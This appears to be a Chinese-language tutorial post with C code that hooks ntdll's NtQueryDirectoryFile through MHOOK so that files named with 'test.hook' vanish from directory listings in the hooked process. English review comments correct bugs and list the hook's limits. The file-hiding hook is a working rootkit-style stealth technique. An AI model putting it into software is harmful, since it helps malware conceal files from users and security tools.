API Hook NtQueryDirectoryFile 隐藏文件

使用 MHOOK 来 hook ntdll 中的 NtQueryDirectoryFile,实现隐藏文件名包含 test.hook 的文件(下面的代码用 wcsstr 做子串匹配,而不是精确匹配);有很多结构体(FILE_BOTH_DIR_INFORMATION、FILE_ID_BOTH_DIR_INFORMATION 等)需要自己定义,直接 Copy 过来即可,下面给出关键代码。需要注意这是用户态 hook:只对注入了该 DLL 的进程生效,且只处理 FindFirstFile 所用的两种 FileInformationClass;直接发起系统调用、使用其它信息类或 NtQueryDirectoryFileEx(Win10 1709+)的程序以及内核态枚举都不受影响。另外,目录信息结构里的 FileName 不带 NUL 结尾,比较时必须以 FileNameLength 为界。

// Prototype of ntdll!NtQueryDirectoryFile, shared by the saved original pointer
// and by the replacement hook below. FileName is the optional search pattern
// (an input), not an output buffer; the directory entries are written to
// FileInformation in the layout selected by FileInformationClass.
typedef NTSTATUS (WINAPI *NTQUERYDIRECTORYFILE)(
	IN HANDLE FileHandle,
	IN HANDLE Event OPTIONAL,
	IN PVOID ApcRoutine OPTIONAL,
	IN PVOID ApcContext OPTIONAL,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	OUT PVOID FileInformation,
	IN ULONG Length,
	IN FILE_INFORMATION_CLASS FileInformationClass,
	IN BOOLEAN ReturnSingleEntry,
	IN PUNICODE_STRING FileName OPTIONAL,
	IN BOOLEAN RestartScan);


// Pointer to the real ntdll!NtQueryDirectoryFile, resolved once at load time.
// Per the post, MHOOK installs ZwNewNtQueryDirectoryFile over it; the hooking
// call itself is not shown here. NOTE(review): neither GetModuleHandle nor
// GetProcAddress is checked for NULL, and the hook calls through this pointer
// unconditionally — a failed lookup turns into a call through a null pointer.
NTQUERYDIRECTORYFILE  TrueNtQueryDirectoryFile=(NTQUERYDIRECTORYFILE)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQueryDirectoryFile");
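// Name tag that marks an entry as hidden. Matching is a case-sensitive substring
// test, exactly like the wcsstr() it replaces. NOTE(review): NTFS names are
// case-insensitive, so "TEST.HOOK" would still be listed; use _wcsnicmp if that matters.
static const WCHAR g_HiddenNameTag[] = L"test.hook";

// STATUS_PENDING is a *success* code (NT_SUCCESS() is true for it). The hand-copied
// NT definitions this file relies on may not include it, so provide it if missing.
#ifndef STATUS_PENDING
#define STATUS_PENDING ((NTSTATUS)0x00000103L)
#endif

// Return TRUE when a directory-entry name contains the hidden tag.
//
// FileName in every FILE_*_DIR_INFORMATION layout is exactly FileNameLength bytes
// long and is NOT NUL-terminated, so the unbounded wcsstr() of the original read
// past the name into the next entry (or past the end of the buffer). The search is
// therefore bounded by the length.
static BOOL EntryNameContainsTag(const WCHAR *name, ULONG nameLengthBytes)
{
	size_t nameChars = nameLengthBytes / sizeof(WCHAR);
	size_t tagChars = (sizeof(g_HiddenNameTag) / sizeof(WCHAR)) - 1;
	size_t i;

	if (nameChars < tagChars)
		return FALSE;
	for (i = 0; i + tagChars <= nameChars; i++) {
		if (wcsncmp(name + i, g_HiddenNameTag, tagChars) == 0)
			return TRUE;
	}
	return FALSE;
}

// Report where FileNameLength and FileName live for the information classes this
// hook filters. Returns FALSE for every other class (FileDirectoryInformation,
// FileFullDirectoryInformation, FileNamesInformation, FileIdFullDirectoryInformation,
// ...); the caller then leaves the buffer untouched, so enumerators that use those
// classes still see the file.
static BOOL LookupNameLayout(FILE_INFORMATION_CLASS cls,
			     size_t *nameLengthOffset, size_t *nameOffset)
{
	switch (cls) {
	case FileIdBothDirectoryInformation:	// FindFirstFile on Vista/Win7 and later
		*nameLengthOffset = (size_t)FIELD_OFFSET(FILE_ID_BOTH_DIR_INFORMATION, FileNameLength);
		*nameOffset = (size_t)FIELD_OFFSET(FILE_ID_BOTH_DIR_INFORMATION, FileName);
		return TRUE;
	case FileBothDirectoryInformation:	// FindFirstFile on XP
		*nameLengthOffset = (size_t)FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileNameLength);
		*nameOffset = (size_t)FIELD_OFFSET(FILE_BOTH_DIR_INFORMATION, FileName);
		return TRUE;
	default:
		return FALSE;
	}
}

// Delete every entry whose name contains the hidden tag from a directory-information
// buffer whose first usedBytes bytes hold entries chained by NextEntryOffset (always
// the first ULONG of every layout). Returns the number of bytes still in use and
// stores the number of surviving entries in *keptEntries.
//
// The buffer is compacted in place with overlapping moves, so RtlMoveMemory (memmove
// semantics) is required; the original used RtlCopyMemory (memcpy), which is
// undefined for overlapping regions. All positions are computed as pointer
// differences rather than (ULONG) casts, which truncate pointers on x64.
static ULONG_PTR StripHiddenEntries(PVOID buffer, ULONG_PTR usedBytes,
				    size_t nameLengthOffset, size_t nameOffset,
				    ULONG *keptEntries)
{
	char *base = (char *)buffer;
	char *prev = NULL;	// last entry that was kept, or NULL if none yet
	char *cur = base;
	ULONG kept = 0;

	for (;;) {
		ULONG_PTR pos = (ULONG_PTR)(cur - base);
		ULONG next;
		ULONG nameLen;

		// The fixed part and the name must lie inside the used region; if not,
		// the buffer is not what we expect and we stop rather than read past it.
		if (pos + nameOffset > usedBytes)
			break;
		next = *(ULONG *)cur;
		nameLen = *(ULONG *)(cur + nameLengthOffset);
		if (pos + nameOffset + nameLen > usedBytes)
			break;

		if (EntryNameContainsTag((const WCHAR *)(cur + nameOffset), nameLen)) {
			OutputDebugStringW(L"已发现目标");
			if (next == 0) {
				// Last entry: unlink it from its predecessor (if any) and drop it.
				if (prev != NULL)
					*(ULONG *)prev = 0;
				usedBytes = pos;
				break;
			}
			if (pos + next > usedBytes)
				break;	// malformed chain; leave the remainder alone
			// Shift the tail of the used region down over this entry. Offsets in the
			// entries are relative, so the chain stays valid after the move.
			RtlMoveMemory(cur, cur + next, usedBytes - (pos + next));
			usedBytes -= next;
			continue;	// re-examine the entry that now sits at cur
		}

		kept++;
		if (next == 0)
			break;
		prev = cur;
		cur += next;
	}

	*keptEntries = kept;
	return usedBytes;
}

// Hook body installed over ntdll!NtQueryDirectoryFile. It forwards the call to the
// original and then removes every entry whose name contains the hidden tag from the
// returned buffer, so FindFirstFile/FindNextFile-style callers in this process never
// see it. Parameters and return value are those of NtQueryDirectoryFile itself.
//
// Fixes relative to the original: names are compared within FileNameLength (they are
// not NUL-terminated); STATUS_PENDING is left alone (the buffer is not filled yet);
// only IoStatusBlock->Information bytes are walked instead of the whole Length;
// overlapping moves use RtlMoveMemory; Information is updated after compaction; and a
// batch in which every entry was hidden (e.g. ReturnSingleEntry on the hidden file,
// which the original handed back unfiltered) is skipped by continuing the scan.
//
// Limitations of a user-mode hook remain: only callers inside this process, only the
// two information classes in LookupNameLayout, and only this entry point — direct
// syscalls, NtQueryDirectoryFileEx (Win10 1709+) and kernel-mode consumers are
// unaffected. If a retry below completes asynchronously (STATUS_PENDING) that batch
// reaches the caller unfiltered.
NTSTATUS WINAPI ZwNewNtQueryDirectoryFile(
	IN HANDLE FileHandle,
	IN HANDLE Event OPTIONAL,
	IN PVOID ApcRoutine OPTIONAL,
	IN PVOID ApcContext OPTIONAL,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	OUT PVOID FileInformation,
	IN ULONG Length,
	IN FILE_INFORMATION_CLASS FileInformationClass,
	IN BOOLEAN ReturnSingleEntry,
	IN PUNICODE_STRING FileName OPTIONAL,
	IN BOOLEAN RestartScan){
	size_t nameLengthOffset = 0;
	size_t nameOffset = 0;

	for (;;) {
		NTSTATUS Status = TrueNtQueryDirectoryFile(FileHandle, Event, ApcRoutine,
			ApcContext, IoStatusBlock, FileInformation, Length,
			FileInformationClass, ReturnSingleEntry, FileName, RestartScan);
		ULONG_PTR usedBytes;
		ULONG kept = 0;

		// Nothing to filter on failure. STATUS_PENDING passes NT_SUCCESS() but means
		// the buffer has not been written yet (asynchronous handle); touching it now
		// would read garbage and the later-completed data would bypass the hook.
		if (!NT_SUCCESS(Status) || Status == STATUS_PENDING)
			return Status;
		if (IoStatusBlock == NULL || FileInformation == NULL)
			return Status;
		if (!LookupNameLayout(FileInformationClass, &nameLengthOffset, &nameOffset))
			return Status;

		// Only the bytes the kernel actually wrote hold entries; the original walked
		// up to Length and so moved stale bytes from the unused tail of the buffer.
		usedBytes = IoStatusBlock->Information;
		if (usedBytes == 0)
			return Status;
		if (usedBytes > Length)
			usedBytes = Length;

		usedBytes = StripHiddenEntries(FileInformation, usedBytes,
					       nameLengthOffset, nameOffset, &kept);
		if (kept > 0) {
			IoStatusBlock->Information = usedBytes;
			return Status;
		}

		// Every entry of this batch was hidden. Rather than return a buffer whose
		// only entries are the hidden ones, continue the scan so the caller gets the
		// next batch or STATUS_NO_MORE_FILES.
		RestartScan = FALSE;
	}
}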

